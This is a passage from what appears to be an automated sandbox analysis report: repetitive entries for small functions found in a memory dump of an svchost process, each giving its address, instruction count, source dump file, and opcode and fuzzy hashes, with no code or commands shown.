                                                                                                                      • Instruction ID: 4a238f1407de3076e1cb180f0ab18ead8051fdf6a67b7c2f4c2c33bb92fb7c17
                                                                                                                      • Opcode Fuzzy Hash: 61bf9530751c4a687e8bbf83f778fd576bd0674744bb7ecf5b369ecb5896ff4c
                                                                                                                      • Instruction Fuzzy Hash: 7AF0E274A02348AFDB04EBA9D555E9F77B4EF48700F0100A4E141EB280D974D9009758
                                                                                                                      Function 03030710 Relevance: .0, Instructions: 28COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                      • Instruction ID: 779a8a767508e5ba438e4a580098120e76a1e2bcc122e7aa369524df57e1e8fe
                                                                                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                      • Instruction Fuzzy Hash: D6F0E53D7073409FDB15DF15D040ADA7BECEB42350B0404D4E8428B301DB31E982CB80
                                                                                                                      Function 031037B6 Relevance: .0, Instructions: 27COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                                      • Instruction ID: 592965b71ba04c6ebbb25478bd0d65a1fbc0c531b2c5ecce3c46d8fe2db320b9
                                                                                                                      • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                                      • Instruction Fuzzy Hash: CFE092B6211204BFE764EB58CD05FE673ECEB44720F140658B125970D0DBB0BE40CB64
                                                                                                                      Function 030EB3D0 Relevance: .0, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                                      • Instruction ID: 181b1eb719aa909f46a4d98429c1664d57f68b6c97142a784f3a9f596983f0d3
                                                                                                                      • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                                      • Instruction Fuzzy Hash: D6E0CD35346314BBDB22AA50CC00FA97B55DB807D0F104031FB085EA50C571DD51D7D4
                                                                                                                      Function 0302823B Relevance: .0, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                      • Instruction ID: 18e1c369a48bdf531232fcffb824c32fe05e5dd3fb7a19f117e78f155689007b
                                                                                                                      • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                      • Instruction Fuzzy Hash: D2E08C39503A20EEDB31EF11DC04B967AA9FB84B10F148C69E0810A4A48770A895DB48
                                                                                                                      Function 030B92BC Relevance: .0, Instructions: 20COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 49e094fcacc3523dbd8b0c02523075c10619e7454af5e2d6d65bc680a31cdae6
                                                                                                                      • Instruction ID: ba3e07981a22dee0d72e4395d57b8387050d7754385098402ef48dde58d883a6
                                                                                                                      • Opcode Fuzzy Hash: 49e094fcacc3523dbd8b0c02523075c10619e7454af5e2d6d65bc680a31cdae6
                                                                                                                      • Instruction Fuzzy Hash: 30F0ED34652B84CFE72EDF04C1E1B5173B9F759B40F500458D4464BBA1C73A9941CA50
                                                                                                                      Function 03032050 Relevance: .0, Instructions: 20COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4b01601a79e37ce7f5baa38a5350093756f74453d657efbcec117d932a4c41b1
                                                                                                                      • Instruction ID: cc26e844358e936e3ce9f77ab498a21f16e90a3976e942324df89d673cbe8747
                                                                                                                      • Opcode Fuzzy Hash: 4b01601a79e37ce7f5baa38a5350093756f74453d657efbcec117d932a4c41b1
                                                                                                                      • Instruction Fuzzy Hash: 6FE0C232201654ABC321FB5DDD00F8A739EEFE5360F004121F1508F6D0CA60AD50C794
                                                                                                                      Function 0302A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                      • Instruction ID: ce2c182f77b530b7b6e2dc9b619333bdf9d32380591e63e8e98fa9fc527b68db
                                                                                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                      • Instruction Fuzzy Hash: 37D0123631717097CB29E6556954FA7AD559BC1AA4F1A006D780AD7900CD158C82D7E0
                                                                                                                      Function 030402A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                      • Instruction ID: c530bb5384036566a0fbb9745759b70f6ac68750a5212e3938a971e8da9f4551
                                                                                                                      • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                      • Instruction Fuzzy Hash: 44D09275213A80CFD65ACB09C6A4B16B3A8BB44A44F8508A0E501CBB61D668EA40CA00
                                                                                                                      Function 030B930B Relevance: .0, Instructions: 12COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                      • Instruction ID: d27fdccbe3c581967e9916bc78d8a77ac6236bb6f24a5687e3689a96b69bc48b
                                                                                                                      • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                      • Instruction Fuzzy Hash: 26D05E35946AC4CFE727CB08C165B907BF8F705F40F890098E04247BA2C37C9984CB14
                                                                                                                      Function 0306C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                      • Instruction ID: 1e344e277649e2742a0fc3f0db720c4b73b7aa931c2458dee4bdbffd149abae2
                                                                                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                      • Instruction Fuzzy Hash: 1BC0123A290648AFC712EA98CD01F427BA9EB98B40F004061F2048B670C631E920EA84
                                                                                                                      Function 03050310 Relevance: .0, Instructions: 11COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                      • Instruction ID: 7da3143d76b8e57cea0eda7d19a875d6db70669ad9ac53a821a87734cf0ad205
                                                                                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                      • Instruction Fuzzy Hash: ECD01236100248EFCB01DF41C890DDE772AFBD8710F148419FD190B6108A31ED62DA50
                                                                                                                      Function 03030750 Relevance: .0, Instructions: 9COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                      • Instruction ID: ddbe01832254e42a93da901c489723a8ecf6b41655a20a43893028b1903eaa63
                                                                                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                      • Instruction Fuzzy Hash: C2C04C797026418FCF15DB19D294F4577E4F744740F1518D0E945CB721E624E911CA10
                                                                                                                      Function 03074340 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5aff11b2c8bfe41281b9b94079535e458086ec5ba879a78feb8cd395cf8a732d
                                                                                                                      • Instruction ID: 01ba5f7c146adeb67287544d76bdd6a3efb55f0173ed54f7b3041f7c1017800d
                                                                                                                      • Opcode Fuzzy Hash: 5aff11b2c8bfe41281b9b94079535e458086ec5ba879a78feb8cd395cf8a732d
                                                                                                                      • Instruction Fuzzy Hash: EB90023160680412A140B25888C4586404697E0301B95C011E0824558C8B148A565361
                                                                                                                      Function 03073010 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7b3f0529ec851a99ecfd003f5960d117bb6afb1f7af1d1997f8089d41794a367
                                                                                                                      • Instruction ID: e0bd43d44e986bd36e8a90078e1262f2de595ab0de44d2c14464fbc3aaa9cc2e
                                                                                                                      • Opcode Fuzzy Hash: 7b3f0529ec851a99ecfd003f5960d117bb6afb1f7af1d1997f8089d41794a367
                                                                                                                      • Instruction Fuzzy Hash: 8F90022120284842E140B3588844B4F414687E1302FD5C019A4556558CCA1589555721
                                                                                                                      Function 03073090 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 67fbe63d28bea02e68ff0c88be21d5f291f7e993902b9c70c5cc8bb9024d3e12
                                                                                                                      • Instruction ID: ebf75311d4cc6e8be332e1bff245d77dc34c9d21d86c180ee46c09a6e422404c
                                                                                                                      • Opcode Fuzzy Hash: 67fbe63d28bea02e68ff0c88be21d5f291f7e993902b9c70c5cc8bb9024d3e12
                                                                                                                      • Instruction Fuzzy Hash: 5F90022124240C02E140B258C4547470047C7D0701F95C011A0424558D87168A6566B1
                                                                                                                      Function 03074650 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 14ed5325b8dbeb6e0d777e801b34c7d60feed6bd491ab4d617d6089b64f3d88a
                                                                                                                      • Instruction ID: 31c4487d3d9f160c0566974e884df66fb97e06aef162cd4979ea005641b483ea
                                                                                                                      • Opcode Fuzzy Hash: 14ed5325b8dbeb6e0d777e801b34c7d60feed6bd491ab4d617d6089b64f3d88a
                                                                                                                      • Instruction Fuzzy Hash: 3C900261602504425140B2588844446604697E13013D5C115A0954564C871889559269
                                                                                                                      Function 03072B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9beeb3a637d7e1e2757340911299b9da0a37609cc836ce79b00695df2a08aa9e
                                                                                                                      • Instruction ID: 227e2f07adcecb058d485ec00e29abd6841de12725c4a87cf210b5026c6d31fc
                                                                                                                      • Opcode Fuzzy Hash: 9beeb3a637d7e1e2757340911299b9da0a37609cc836ce79b00695df2a08aa9e
                                                                                                                      • Instruction Fuzzy Hash: 6090023120240C02E104B25888446C6004687D0301F95C011A6424659E976589917131
                                                                                                                      Function 03072BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fab693e33a595e6f9a93738cbed6d909b737bc8dc3323eaba215097a2c04f2e4
                                                                                                                      • Instruction ID: ce895da96dbeacc49fe7a3c7f0bac4081e15daec10a300372ab21e5252573c09
                                                                                                                      • Opcode Fuzzy Hash: fab693e33a595e6f9a93738cbed6d909b737bc8dc3323eaba215097a2c04f2e4
                                                                                                                      • Instruction Fuzzy Hash: 4790023160640C02E150B2588454786004687D0301F95C011A0424658D87558B5576A1
                                                                                                                      Function 03072BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0ce42a06625f11c05117fce9047302c0c86125f4c55c9570ab75b2d8a553bcdc
                                                                                                                      • Instruction ID: 255c6646a32e1e43b1bb9576642367f3a175ad6cd3d5e5a7799d590c98329b94
                                                                                                                      • Opcode Fuzzy Hash: 0ce42a06625f11c05117fce9047302c0c86125f4c55c9570ab75b2d8a553bcdc
                                                                                                                      • Instruction Fuzzy Hash: A290023120644C42E140B2588444A86005687D0305F95C011A0464698D97258E55B661
                                                                                                                      Function 03072BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d2ecd73aa1907b577acb52217f195f2fd39b1b1382e17cea329659f9e51632c7
                                                                                                                      • Instruction ID: 3c6f16fb4803e66306a919d02b0ed0964663dd0b229da0ff1e2f2945a35aba23
                                                                                                                      • Opcode Fuzzy Hash: d2ecd73aa1907b577acb52217f195f2fd39b1b1382e17cea329659f9e51632c7
                                                                                                                      • Instruction Fuzzy Hash: F390023120240C02E180B258844468A004687D1301FD5C015A0425658DCB158B5977A1
                                                                                                                      Function 03072AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 71950d6b2a273f71883d471caa27ddedf2f94ad0f65f25460e9e9e55a31a77e6
                                                                                                                      • Instruction ID: 53bfc74c396a34ef3c976f83325eaf9fe084aecaadfc8bf3f95ec0c3c13504d4
                                                                                                                      • Opcode Fuzzy Hash: 71950d6b2a273f71883d471caa27ddedf2f94ad0f65f25460e9e9e55a31a77e6
                                                                                                                      • Instruction Fuzzy Hash: 999002A1202544925500F358C444B4A454687E0301B95C016E1454564CC62589519135
                                                                                                                      Function 03072AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5adf3f4f62f1743d398325e58fefc8934ea559047cfa1af1e324c326111b5bc7
                                                                                                                      • Instruction ID: 543774f7e8848665e136c1e0f34eddc367816028f2ef09b3cb3deb809d18aca6
                                                                                                                      • Opcode Fuzzy Hash: 5adf3f4f62f1743d398325e58fefc8934ea559047cfa1af1e324c326111b5bc7
                                                                                                                      • Instruction Fuzzy Hash: AB900435313404031105F75C474454700C7C7D53513D5C031F1415554CD731CD715131
                                                                                                                      Function 03072AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 48a5500da2e201d55830f8e5a5e9021066021698078473febf91685f13109a5c
                                                                                                                      • Instruction ID: 6a6754bd2313b40ec769639cad49c7e8b135cf34327a501fa8046361ee866ac6
                                                                                                                      • Opcode Fuzzy Hash: 48a5500da2e201d55830f8e5a5e9021066021698078473febf91685f13109a5c
                                                                                                                      • Instruction Fuzzy Hash: 67900225222404021145F658464454B048697D63513D5C015F1816594CC72189655321
                                                                                                                      Function 030739B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9043e7893926109a5e40f856afe00e99608a6da5a502914f29dc5028e37f9670
                                                                                                                      • Instruction ID: eb156590f21a9b630ce5d02182779a646c02addbd681235926ae6803285b9f27
                                                                                                                      • Opcode Fuzzy Hash: 9043e7893926109a5e40f856afe00e99608a6da5a502914f29dc5028e37f9670
                                                                                                                      • Instruction Fuzzy Hash: 2190022124645502E150B25C84446564046A7E0301F95C021A0C14598D865589556221
                                                                                                                      Function 03072F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cd8937a8ea712eafacd35b8d478e011a7bcaed903b5ecfcd1669dca501ad6880
                                                                                                                      • Instruction ID: c0a0d0c4ee9ba504824587f5a3972a5381c4084f3c484e40d383d1b7c7ac4cc6
                                                                                                                      • Opcode Fuzzy Hash: cd8937a8ea712eafacd35b8d478e011a7bcaed903b5ecfcd1669dca501ad6880
                                                                                                                      • Instruction Fuzzy Hash: CE90026134240842E100B2588454B460046C7E1301F95C015E1464558D8719CD526126
                                                                                                                      Function 03072F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 567ab1fd4de1de95b172f8c2f5c4e4e410b6c917e67f7578829b5e2cdacc1e1b
                                                                                                                      • Instruction ID: 589c443384bfd58a6036586d82a3e4897951327609ead191bf57e50a6527f1d6
                                                                                                                      • Opcode Fuzzy Hash: 567ab1fd4de1de95b172f8c2f5c4e4e410b6c917e67f7578829b5e2cdacc1e1b
                                                                                                                      • Instruction Fuzzy Hash: 4F90026121240442E104B2588444746008687E1301F95C012A2554558CC6298D615125
                                                                                                                      Function 03072F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c7d4130e7069615d1400ed92d3bcc369ed40eecc1dd307a35a5b2e007344fbed
                                                                                                                      • Instruction ID: add784bdaf0fe916617e9a67b52b4f221d05125f7eb078418e6adbe9b58e3c00
                                                                                                                      • Opcode Fuzzy Hash: c7d4130e7069615d1400ed92d3bcc369ed40eecc1dd307a35a5b2e007344fbed
                                                                                                                      • Instruction Fuzzy Hash: 3890023120280802E100B258885474B004687D0302F95C011A1564559D872589516571
                                                                                                                      Function 03072FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8bdbddd1bd6ce66043a5e409307a4e6634204e68a5fc178ace44273cb116fc7a
                                                                                                                      • Instruction ID: a9c794e1701644b40bffe02d8802be2308a351e11e4070e73799f881a963a181
                                                                                                                      • Opcode Fuzzy Hash: 8bdbddd1bd6ce66043a5e409307a4e6634204e68a5fc178ace44273cb116fc7a
                                                                                                                      • Instruction Fuzzy Hash: E290023120280802E100B2588848787004687D0302F95C011A5564559E8765C9916531
                                                                                                                      Function 03072FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 655b17162b0e3aeffe7f3ca3bbc74c6f42d6bac28e3dac494b0994ccbefbebd0
                                                                                                                      • Instruction ID: 65afde1f8cfe999067e12f5c41dbe510717b95ea0f6be72c69ea0bf165d23a1e
                                                                                                                      • Opcode Fuzzy Hash: 655b17162b0e3aeffe7f3ca3bbc74c6f42d6bac28e3dac494b0994ccbefbebd0
                                                                                                                      • Instruction Fuzzy Hash: E5900221602404425140B268C8849464046ABE1311795C121A0D98554D865989655665
